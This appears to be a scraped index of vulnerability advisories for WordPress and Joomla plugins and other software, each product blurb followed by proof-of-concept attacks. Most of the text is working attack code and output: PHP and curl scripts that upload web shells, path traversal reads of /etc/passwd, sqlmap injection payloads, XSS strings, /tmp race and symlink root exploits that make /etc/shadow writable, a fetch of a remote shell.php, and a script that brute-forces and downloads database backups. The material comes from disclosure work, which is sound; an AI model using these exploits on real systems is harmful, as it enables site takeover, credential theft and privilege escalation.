Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"
The uploaded file is then reachable at:
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php
AnyVar is a simple search and replace plugin. It lets you add changeable variables (text snippets) to posts, sidebars, widgets, links & themes.
In the text field box the following will trigger a JS alert popup: </textarea><script>alert(1);</script><textarea>
A Stack Overflow inspired plugin for WordPress which allows users to acquire badges for contributing website content. Badges are created and managed through the WordPress Dashboard.
"><script>alert(1);</script> in the title or description field will inject js.
MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.
Create any type of user and copy the contents of your cookie file for curl:
$ curl -F "file=@/home/larry/shell.php5" "http://example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1" -F "upload_dir=/usr/share/wordpress/wp-content/uploads" --cookie cookie.txt
{"OK": 1}
Incomplete fix for CVE-2015-1000000
Teradata Studio Express provides an information discovery tool that retrieves data from Teradata Database systems and allows the data to be manipulated and stored on the desktop. It is built on the Eclipse Rich Client Platform (RCP).
$ ln -s /etc/passwd /tmp/javaver
Teradata is a relational database, they provide a Virtual Machine image for developers and community use.
$ while true; do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done
A database appliance for virtual machine environments.
$ echo "#!/bin/bash" > /etc/luminex/pkgmgr
$ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr
$ chmod 755 /etc/luminex/pkgmgr
Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.
$ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
Type: UNION query
Title: Generic UNION query (random number) - 15 columns
Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
---
[16:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[16:48:10] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 6637 times
[16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 16:48:10
Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.
$ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
---
[13:30:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[13:30:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2715 times
[13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
[*] shutting down at 13:30:39
A video slideshow gallery.
$ sqlmap -u 'http://example.com/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"
.
.
.
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
---
[19:36:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[19:36:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2714 times
[19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
[*] shutting down at 19:36:55
Huge-IT Slider extension is one of the powerful products that our company offer. It gives style and charm to your site and help to attract the attention of visitors to certain parts of the content.
XSS:
http://192.168.0.125/administrator/index.php?option=com_slider&view=slider&id=1%20--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
SQLi:
http://192.168.0.125/administrator/index.php?option=com_slider&view=slider&id=HERE
This extension is designed to help you display the products in the most attractive way. Joomla Catalog Extension has a stylish design with convenient construction for displaying the product to the customers.
SQLi:
$ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_catalog&view=catalog&id=*" --dbms mysql
XSS:
http://192.168.0.125/administrator/index.php?option=com_catalog&view=catalog&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Huge-IT Slideshow Extension is one of the powerful products that our company offers. It gives style and charm to your site and help to attract the attention of visitors to certain parts of the content.
SQLi:
$ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_slideshow&view=slideshow&id=*" --dbms mysql
XSS:
http://192.168.0.125/administrator/index.php?option=com_slideshow&view=slideshow&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.
sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_portfoliogallery&view=portfoliogallery&id=*" --dbms mysql --dump
The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.
XSS PoC:
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
SQLi PoC:
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE
$ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql
Video comments integrated with the standard comment system of wordpress.
$ curl --data @image.jpg "http://wp-site/wp-content/plugins/contus-video-comments/save.php?id=../image"
Transform your mp3 audio files into a nice, small light HTML5 player.
$ curl "http://wpsite/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/tmp/s3kr3t_audio_file.mp3" --cookie "mapdownload=true"
$ curl "http://192.168.0.2/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=http://192.168.0.3/tee.php" --cookie "mapdownload=true"
An easy to use directory plugin to create an address book, business directory, staff directory or church directory.
An accessible Shopping Cart plugin. eShop is an accessible shopping cart plugin for WordPress, packed with various features.
XSS: CVE-2016-0765. SQLi: CVE-2016-0769.
DeleGate is a multipurpose proxy server which relays various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and more. DeleGate mediates communication between servers and clients where direct communication is impossible, inefficient, or inconvenient.
$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme
Cool Video Gallery is a Video Gallery plugin for WordPress with option to upload videos, attach media files, add Youtube videos and manage them in multiple galleries. Automatic preview image generation for uploaded videos using FFMPEG library available. Option provided to upload images for video previews. Supports '.flv', '.mp4', '.mov', '.m4v' and '.mp3' video files presently.
See attached screen shots.
Capture visitors names and email addresses by offering FREE downloads to your visitors in exchange for their email address with our Double Opt-In Plug
IBM Installation Manager is a command line utility to install various software packages developed by IBM.
=====> IBM Installation Manager> Password required
Credentials are required to connect to the IBM download site. Enter IBM ID and password.
Select:
P. Provide credentials and connect
C. Cancel
Select 'P' to enter credentials and connect, or 'C' to cancel.
Forgot your IBM ID?
https://www.ibm.com/account/profile?page=forgotuid
Forgot your password?
https://www.ibm.com/account/profile?page=forgot
IBM ID help and FAQ
https://www.ibm.com/account/profile/us/en?page=regfaqhelp
-----> C
/*
fsnoop v3.3 module for exploitation of:
http://www.vapidlabs.com/advisory.php?v=156
special thanks to v14dz for getting this working, and Mudge @dotmudge for pointing me
at his /tmp race condition tool l0pht-watch.
@v14dz
http://vladz.devzero.fr/
$ make ibm-consoleinst.so
/tmp/x is the script the installer ends up running as root:
#!/bin/sh
chmod 777 /etc/passwd
$ ./fsnoop -p ibm-consoleinst.so
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
[+] ./ibm-consoleinst.so: payload=[0xb77775fb] file=[/tmp/consoleinst-HEREPID.sh]
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
[+] ./ibm-consoleinst.so: Exploitation done.
[+] ./ibm-consoleinst.so: Unloading module.
ls -l /etc/passwd
-rwxrwxrwx 1 root root 1901 Nov 22 2014 /etc/passwd
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
char title[] = "** IBM Console Install Exploit **";
/* filters */
char proc_name[] = "/bin/sh ./consoleinst.sh";
char file[] = "/tmp/consoleinst-HEREPID.sh";
/* Evil routines */
void payload() {
int fd;
/*from v14dz: I use a fifo here, to unlock the paymod execution right after the cp command*/
mkfifo(file, 0666);
fd = open(file, O_RDONLY);
rename(file, "/tmp/a");
rename("/tmp/x", file);
}
wp-championship is a plugin for wordpress letting you play a guessing game of a tournament e.g. soccer.
Untested: $ sqlmap -u 'http://wp.site:80/wp-admin/wp-championship/cs_admin_users.php&userid=' --data="isadmin=1&user" --cookie=AUTH_COOKIE_HERE --level=5 --risk=3
MyPixs is a simple, yet powerful JavaScript and PHP application that gives you the possibility to display a lot of photos on your blog.
curl http://example.com/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd
Csv2WPeC Coupon provides an easy way to import and export WP e-Commerce Coupon items from and to a CSV file.
<?php
echo "Running PoC against target site<br>";
$uploadfile="/var/www/s.pht";
$ch = curl_init("http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.pht'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
DukaPress is open source software that can be used to build online shops quickly and easily. DukaPress is built on top of WordPress, a world class content management system. DukaPress is built to be both simple and elegant yet powerful and scalable.
Automatically insert Google Adsense ads and Hotel Reservations.
<?php
$target_url = 'http://www.example.com/wp-content/plugins/google-adsense-and-hotel-booking/proxy.php';
echo "POST to $target_url";
$post = array('url' => $target_url,'url'=>$target_url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "#####################################";
echo $result;
echo "#####################################";
?>
Easy, Flexible Audio for WordPress.
$ curl http://www.example.com/wp-content/plugins/mp3-jplayer/download.php?mp3=.
WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it.
$ curl http://www.example.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Manipulate your wordpress images using slider and tickboxes.
curl -sk "http://www.vapidlabs.com/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"
Indonesian shipping plugin that integrates with the WP e-Commerce plugin. Last tested with WP e-Commerce version 3.8.11.1. With WPE Indoshipping you can display a list of postage rates per area in Indonesia that you choose, suitable for showing postage from JNE, TIKI or others, and the rate directly affects the value of the order.
<?php
$uploadfile="/var/www/shell.php";
$ch = curl_init("http://example.com/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$uploadfile",'upload_path'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'shell.php'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
$ curl -v "http://www.example.com/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd"
This plugin allows you to easily add a candidate application form to a job vacancy post, which allows the candidate to apply for the vacancy.
$ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
Members can upload and download files, create directories up to unlimited level.
<?php
/*
Exploit for wp-front-end-repository remote shell upload.
Larry W. Cashdollar, @_larry0
7/11/2015
*/
$uploadfile="/var/www/shell.php";
$ch = curl_init("http://www.vapidlabs.com/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'shell.php'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Creates a downloadlink with the browsers SaveAs dialog for all available filetypes. A download counter can be shown on the post and admin area.
$ curl "http://www.vapidlabs.com/wp-content/plugins/filedownload/download.php?path=http://www.google.com"
http://www.vapidlabs.com/wp-content/plugins/filedownload/download.php?path=www.google.com&referer="><script>alert(1);</script>
Add images to your blog posts from a URL in a flash. Skip the download/upload steps and the slow WordPress dialog box.
$ curl "http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://192.168.0.2/shell.php"
The shell location is reported back to the user with a random filename. The URL's site must not interpret PHP, but must allow it to be downloaded.
MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.
<?php
/*Larry W. Cashdollar @_larry0
Exploit for mailcwp v1.99 shell will be called 1-shell.php.
7/9/2015
*/
$target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
The vendor patch for this vulnerability only requires that the user have a login on the WordPress site before exploiting this vulnerability.
curl -F "file=@/tmp/shell.pht" "http://example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1" -F "upload_dir=/usr/share/wordpress/wp-content/uploads" --cookie cookie.txt
IBS Mappro is a comprehensive map creator, editor, and view generator based on the Google Maps API v3 and supports kml, kmz, and gpx map files.
http://example.com/wp-content/plugins/ibs-mappro/lib/download.php?file=/etc/passwd
Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.
$ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd
Image Export plugin can help you selectively download images uploaded by an administrator.
$ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
$ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site.
$ curl http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd
fixed in 2.1.1.
This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible with iPhone and iPad. It also allows use as a widget. You can also enable this Powerplay Gallery on your WordPress site by placing a code snippet in your template (.php) files. It shows a Flash gallery for desktops and a touch-enabled version for iPad and iPhone.
<?php
/*Remote shell upload exploit for wp-powerplaygallery v3.3 */
/*Larry W. Cashdollar @_larry0
6/27/2015
albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
but you can enumerate these by using curl, and looking for redirect 301 responses:
e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
->301 exists else 404 doesn't.
shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3
Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3
Download all attachments from the post into a zip file.
http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd
WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page.
curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=." http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip
Simple and lightweight plugin to add a "Download" button to your posts, pages or custom post types.
http://www.example.com/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.
$ curl http://www.vapidlabs.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
Gmedia Gallery is a fully integrated Image, Music, Video Gallery WordPress plugin with a powerful admin panel.
Open Proxy: http://www.vapidlabs.com/wp-content/plugins/grand-media/assets/image-editor/camanjs/proxies/caman_proxy.php?camanProxyUrl=http://192.168.0.2/banner3.jpeg
Local Image Files: http://www.vapidlabs.com/wp-content/plugins/grand-media/assets/image-editor/camanjs/proxies/caman_proxy.php?camanProxyUrl=/tmp/loader.gif
122811
XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!
TBD
A mood board is a type of collage consisting of images, text, and samples of objects in a composition. They may be physical or digital, and can be "extremely effective" presentation tools.
http://www.vapidlabs.internal/wp-content/plugins/adsense-click-fraud-monitoring/phpwhois/whois.php?query=%27%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&output=nice
122368
Prevents to be banned and excluded from your AdSense account due to malicious or unintended third party clicks on advertisements on your website.
http://www.vapidlabs.internal/wp-content/plugins/adsense-click-fraud-monitoring/phpwhois/whois.php?query=%27%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&output=nice
VideoWhisper Video Consultation is a web based video communication solution designed for online video consultations, interactive live presentations, trainings, webinars, coaching and online collaboration with webcam support. Read more on WordPress Video Presentation plugin home page.
<?php
$uploadfile="upexp.phtml";
$ch = curl_init("http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('vw_file'=>"@$uploadfile",'name'=>'upexp.phtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
upexp.phtml
<?php
phpinfo();
?>
The executable should be located in wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads.
VideoWhisper Video Conference is a modern web based multiple way video chat and real time file sharing tool. Read more on WordPress Video Conference plugin home page.
<?php
$uploadfile="upexp.phtml";
$ch = curl_init("http://target_site/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('vw_file'=>"@$uploadfile",'name'=>'upexp.phtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
upexp.phtml
<?php
phpinfo();
?>
The executable should be located in wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads.
This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically.
$ while (true) do ps -ef |grep [p]assword; done
118579
SEANux 1.0 is a Linux distribution developed by the Syrian Electronic Army. The distribution is focused on penetration testing and contains custom tools the SEA has developed.
<!-- PoC for http://www.vapid.dhs.org/blog/01-23-2015/
Larry W. Cashdollar
@_larry0
2/9/2015
-->
<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
<script>
$(document).ready(function(){
$.post("http://localhost/tools/Exe.php",
{
cmd: "touch /tmp/hello",
execute: "Execute"
},
function(data,status){
alert("Data: " + data + "\nResult: " + status);
});
});
</script>
</head>
<body>
<h2>
Hello! You just executed the "touch /tmp/hello" command as www-data on your SEANux 1.0 installation.
</h2>
<hr>
<br>
<a href="http://www.vapid.dhs.org/blog/01-23-2015/">Details Here</a>
</body>
</html>
117796
Allows you to optimize, repair, back up and restore the database, delete database backups, drop/empty tables and run selected queries. Supports automatic scheduling of backing up, optimizing and repairing the database.
113508 113507 113509
NextCellent Gallery provides a powerful engine for uploading and managing galleries of images, with the ability to batch upload, import meta data, add/delete/rearrange/sort images, edit thumbnails, group galleries into albums, and more. It also provides two front-end display styles (slideshows and thumbnail galleries), both of which come with a wide array of options for controlling size, style, timing, transitions, controls, lightbox effects, and more.
106474
XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!.
All input fields I believe are vulnerable, I've chosen the backup filename and a wget of sh.txt which is simply <?php passthru($_GET)?> into a writable directory by www-data.
#!/bin/bash
#Exploit to download XCloner v3.1.1 Database backups
#Larry W. Cashdollar, @_larry0
#XCloner recommends a backup storage path under the WP root directory
#it uses a 0 size index.html file to block indexing.
#we can try to brute force the filenames it creates.
MONTH=10
DAY=30
#May need to set the DOMAIN to $1 the target depending on how WP is configured.
DOMAIN=
for y in `seq -w 1 24`; do
for x in `seq -w 1 59`; do
CPATH="http://$1/administrator/backups/backup_2014-"$MONTH"-"$DAY"_"$y"-"$x"_$DOMAIN-sql-nodrop.tar";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo "Downloading......";
wget $CPATH
fi;
done
done
lwc@wordpress:~$ bash exp.sh 192.168.0.26
[+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar Found
[+] Received HTTP/1.1 200 OK
Downloading......
--2014-10-30 13:02:51-- http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar
Connecting to 192.168.0.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44400640 (42M) [application/x-tar]
Saving to: `backup_2014-10-30_06-27_-sql-nodrop.tar.1'
100%[========================================>] 44,400,640 56.9M/s in 0.7s
2014-10-30 13:02:52 (56.9 MB/s) - `backup_2014-10-30_06-27_-sql-nodrop.tar.1' saved [44400640/44400640]
[+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar Found
[+] Received HTTP/1.1 200 OK
Downloading......
--2014-10-30 13:02:52-- http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar
Connecting to 192.168.0.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44400640 (42M) [application/x-tar]
Saving to: `backup_2014-10-30_06-33_-sql-nodrop.tar.1'
100%[========================================>] 44,400,640 64.1M/s in 0.7s
2014-10-30 13:02:53 (64.1 MB/s) - `backup_2014-10-30_06-33_-sql-nodrop.tar.1' saved [44400640/44400640]
114176 114177 114178 114179 114180
This plugin allows you to physically rename media files by updating their titles. It also automatically updates their links in posts.
102768
**Run over 60 servers with over 70 protocols!**
Now you can run a CVS, DC Hub, DHCP, UPnP, DNS, DDNS, eDonkey, Email (POP3 / SMTP), FTP Proxy, FTP, FTPS, FTPES, Flash Policy, Git, Gopher, HTTP Snoop, ICAP, IRC Bot, IRC, ISCSI, Icecast, LPD, Load Balancer, MQTT, Memcached, MongoDB, MySQL, NFS, NTP, NZB Client, Napster, PHP and Lighttpd, PXE, Port Forwarder, Proxy, RTMP, Remote Control, Rsync, SIP, SMB/CIFS, SMPP, SMS, Socks, SFTP, SSH, Server Monitor, Stomp, Styx, Syslog, TFTP, Telnet, Time, Trigger, Unison, UPnP Port Mapper, VNC, VPN, Wake On Lan, Web, WebDAV, WebSocket, X11 and/or XMPP server! Start a server easily on the 'Simple' tab or go advanced and add users, allowed IP's, rules and more! Multiple servers can be run at the same time! No root needed, exceptions mentioned below.
**Over 16 network tools!**
Trial: This app will work for 14 days after which you will need to buy the paid version. You can also only add two servers in this app. Unfortunately we need to do this to support development.
**Remote control support!**
Server limitations:
- Port Forwarder: root needed.
- VNC Server: root needed and doesn’t work on most devices.
- Samba Server: won’t work on Windows.
- CVS, UPnP, Email, PHP, Lighttpd, MySQL, Rsync, VNC Server: only one server of this type can run at the same time.
